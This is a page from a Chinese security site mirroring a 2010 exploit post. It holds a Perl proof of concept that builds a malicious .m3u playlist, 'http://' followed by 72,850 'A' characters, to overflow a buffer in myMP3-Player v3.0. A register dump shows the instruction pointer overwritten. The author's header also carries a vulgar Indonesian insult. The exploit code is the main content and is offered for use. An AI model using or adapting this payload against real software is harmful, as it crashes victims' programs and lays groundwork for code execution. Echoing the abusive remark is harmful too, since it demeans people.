首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
myMP3-Player v3.0 (.m3u) Local Buffer Overflow PoC
来源:Inj3ct0r.com 作者:cr4wl3r 发布时间:2010-03-19  
==================================================
myMP3-Player v3.0 (.m3u) Local Buffer Overflow PoC 
==================================================

#!/usr/bin/perl

# myMP3-Player v3.0 (.m3u) Local Buffer Overflow PoC

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0     _                   __           __       __                     1
# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
# 1                  \ \____/ >> Exploit database separated by exploit   0
# 0                   \/___/          type (local, remote, DoS, etc.)    1
# 1                                                                      1
# 0  [+] Site            : Inj3ct0r.com                                  0
# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
# 0                                                                      0
# 1                    ######################################            1
# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1
# 1                    ######################################            0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# [+] Discovered By: cr4wl3r
# [+] Download: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# [+] Note: Kontol loe homo yang suka nyebar bugs tapi engga tau gimana caranya nyari bugs, sekarang gw tunjukin ke loe begini caranya

#EAX 00000000
#ECX 41414141
#EDX 7C9037D8 ntdll.7C9037D8
#EBX 00000000
#ESP 0012BE40
#EBP 0012BE60
#ESI 00000000
#EDI 00000000
#EIP 41414141
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0
#EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
#MM0 0020 0202 0000 001B
#MM1 015A F2BC 8986 2BC0
#MM2 011C 0000 4020 027F
#MM3 0000 0000 804D A735
#MM4 BADB 0D00 BF83 15E6
#MM5 8A1B EAB8 0000 0005
#MM6 0000 0000 0000 0000
#MM7 D1B7 1758 E219 6000


print "#####################################################\n";
print "[!] myMP3-Player v3.0 (.m3u) Local Buffer Overflow PoC\n";
print "\n";
print "[!] By: cr4wl3r\n";
print "[!] Greetz: Inj3ct0r Team r0073r, 0x1D, bL4Ck_3n91n3\n";
print "#####################################################\n";


my $boom = "http://"."A" x 72850;
my $filename = "sploit.m3u";
open (file,">$filename");
print file "$boom";
print "\nDone!\n";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Energizer DUO USB Battery Char
·VariCAD 2010-2.05 EN Local buf
·myMP3-Player v3.0 (.m3u) Local
·Adobe Reader PDF LibTiff Integ
·mplayer <= 4.4.1 NULL pointer
·Virtual PC Hypervisor Memory P
·Win32 Mini HardCode WinExec&Ex
·Windisc version 1.3 Stack Buff
·MediaCoder (.lst) file local B
·Linux Kernel 'fasync_helper()'
·ZippHo 3.0.6 (.zip) 0day stack
·Linux Kernel 'net/ipv6/ip6_out
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved